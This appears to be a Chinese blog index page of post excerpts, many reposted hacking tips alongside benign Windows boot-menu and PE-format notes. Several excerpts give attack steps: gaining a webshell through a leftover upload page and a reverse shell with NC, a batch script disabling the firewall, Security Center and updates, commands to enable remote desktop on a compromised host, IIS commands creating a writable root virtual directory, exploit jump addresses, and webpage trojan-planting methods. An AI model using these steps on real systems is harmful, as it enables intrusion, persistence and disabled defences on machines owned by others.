利用ORACLE系统账户默认口令提升权限(ZT)
摘要:
近日,偶到一主机上逛了一圈。主机的配置还算是安全,偏偏一个比较隐藏的目录下残留了upfile.asp,结果轻轻松松的得到了webshell。
接着在主机上逛了逛,拿出superscan从外面扫了下,只开放了80端口。从user\程序目录里,发现有一快捷方式:firecontrol,好象是某款硬件防火墙的控制台。WEBSHELL下检测了下开放的服务,发现一般的可提权的方法都不可行,无SERV-U等等,主机的补丁也是打到了最新。试了下传了个NC上去,反连接得到一SHELL,这下比在老兵的管理器里舒服多了。
在C盘下看到一个目录oracle,看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件,确定了主机的服务名“xxx”,看了下版本“oracle 8i”,用数据库连接器
.............
阅读全文
命令行添加程序到windows默认防火墙
摘要: @echo off
net stop "Security Center"
net stop SharedAccess
reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 0x4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 0x4 /f
阅读全文
“PE文件格式”1.9版 完整译文(附注释)
摘要: 标 题: 【翻译】“PE文件格式”1.9版 完整译文(附注释)
作 者: ah007
时 间: 2006-02-28,13:32
链 接: http://bbs.pediy.com/showthread.php?threadid=21932
$Id: pe.txt,v 1.9 1999/03/20 23:55:09 LUEVELSMEYER Exp $
PE文件格式系列译文之一----
【翻译】“PE文件格式”1.9版 完整译文(附注释)
=========================================================
原著:Bernd. Luevelsmeyer
翻译:ah007
[注意:本译文的所有大小标题序号都是译者添加,以方便大家阅读。圆圈内的数字是注释的编号,其中注释②译自微软的《PECOFF规范》,其它译自网络。----译者]
.........
阅读全文
脚本加密方法大全(ZT)
摘要: 本文一共介绍了七种方法:
一:最简单的加密解密
二:转义字符"\"的妙用
三:使用Microsoft出品的脚本编码器Script Encoder来进行编码 (自创简单解码)
四:任意添加NUL空字符(十六进制00H) (自创)
...................
阅读全文
一些opcodes(ZT)
摘要: 近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
简体中文windows的通用跳转地址:(2k/XP/2k3)
0x7ffa45f3 jmp ecx \xff\xe1
0x7ffa4967 jmp ebp \xff\xe5
0x7ffa4a1b jmp ebx \xff\xe3
..............
阅读全文
开3389的几种方法(留帖备查)
摘要: 1.打开记事本,编辑内容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
...................
阅读全文
adsutil.vbs
摘要: web 和 数据分离,有Pcanywhere,数据库服务器有 IIS,
cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一个Web服务的端口
cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir创建一个虚拟目录wodexi
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/path c:\ 设置路径
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/accesswrite 1设置写权限
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi
阅读全文
挂马代码大全(ZT)
摘要: 一:框架挂马
二:js文件挂马
首先将以下代码
document.write("
");
保存为xxx.js,
则JS挂马代码为
三:js变形加密
muma.txt可改成任意后缀
.............
阅读全文
水果机密码解码 "密码公式" 看了就知道怎么打暴机了(ZT)
摘要: 笨驴的老虎机一共有7个赌项,分别是:
bar,赔率50,出现概率1/22(不明白为什么用这个词,英语达人来讲讲,偶门家乡管这个叫大50);
77,赔率30,出现概率1/11;
西瓜,赔率10,出现概率1/11;
星星,赔率8,出现概率3/22;
铃当,赔率6,出现概率3/22;
木瓜,赔率4,出现概率2/11;
苹果,赔率2,出现概率3/11;
...................
阅读全文
用ntfs流隐藏文件(zt)
摘要: 大家把ntfs分区上的文件拷贝到非ntfs分区上时, 可能偶尔遇到过下面的情况, 系统提示会有数据丢失, 这是怎么回事呢?
实际上ntfs文件系统引入了"流"这个概念, 每个文件都可以有多个流, 而我们一般只使用了一个, 通过给文件分配更多的流, 可以实现某种意义上的"文件隐藏". 例如可以控制台中使用下面的命令建立一个文本文件:
dir d:>abc.txt
............
阅读全文
冰刃IceSword FAQ 进程、端口、服务篇(ZT)
摘要: 问:现在进程端口工具很多,什么要使用IceSword?
答:1、绝大多数所谓的进程工具都是利用Windows的Toolhlp32或psapi再或ZwQuerySystemInformation系统调用(前二者最终也用到此调用)来编写,随便一个ApiHook就可轻轻松松干掉它们,更不用说一些内核级 后门了;极少数工具利用内核线程调度结构来查询进程,这种方案需要硬编码,不仅不同
版本系统不同,打个补丁也可能需要升级程序,并且现在有人也提出过防止此
种查找的方法。而IceSword的进程查找核心态方案是目前独一无二的,并且
充分考虑内核后门可能的隐藏手段,目前可以查出所有隐藏进程。
2、绝大多数工具查找进程路径名也是通过Toolhlp32、psapi,前者会调用RtlDebug***函数向目标注入远线程,后者会用调试api读取目标进程内存,本质上都是对PEB的枚举,前面我的blog提到过轻易修改PEB就让这些工具找不到 北了。而IceSword的核心态方案原原本本地将全路径展示,就算运行时剪切到其他路径也会随之显示。
3、进程dll
阅读全文
Vista启动菜单的多个问题
摘要: 经历了上次的"Acronis os selector 引发系统不能启动"事件后,我的vista也废了,恢复过程中碰到多个问题,记录一下以备查阅
C盘 Windows2003
D盘 Windows Vista
E盘 Ubuntu
F盘 数据,软件等
我先Ghost恢复了Windows2003,再恢复Ubuntu,由于Vista在Ghost备份之后加了很多东西,梦幻桌面,收音机等很多侧边栏等等的工具,没有进行Ghost恢复,使用Vista PE启动光盘启动,有个修复Vista启动项的程序,修复重启(应该是此时生成了BCD数据库),发现只能进Windows Vista,没有Windows2003的多启动菜单了,再次使用Vista PE启动光盘启动,修改BCD数据库文件,执行如下命令
bcdedit /create {ntldr} /d "Windows 2003"
bcdedit /set {ntldr} device partition=C:
bcdedit /set {ntldr} path \ntldr
阅读全文
更改驱动器号
摘要: HKEY_LOCAL_MACHINE\SYSTEM\MountedDevices
一看就明白
阅读全文
教你如何双启动Windows XP和Windows Vista(ZT)
摘要: 假如你认为安装一个Windows操作系统不够用,或者你感觉生活中的麻烦还不够多,那就同时安装Windows XP和Windows Vista系统吧。
为什么不呢?坦率的说,我不知道为什么有人想这么做。正如在上一篇博客中提到的那样,Windows Vista对于MBR(主引导记录)的支配地位,使得处理器十分排外。一旦电脑上安装了Vista,用户 就必须按照Vista制定的规则来操作电脑。
硬盘分区
...........
阅读全文
解决Vista的多启动菜单
摘要: 同样,网上讲的,大多数是垃圾
比如C盘有个Win2k3,使用Vista PE启动,使用命令行执行如下命令
bcdedit /create {ntldr} /d "Windows 2003"
bcdedit /set {ntldr} device partition=C:
bcdedit /set {ntldr} path \ntldr
bcdedit /displayorder {ntldr} -addlast
以上是我碰到的Vista启动菜单问题的解决方法
............
阅读全文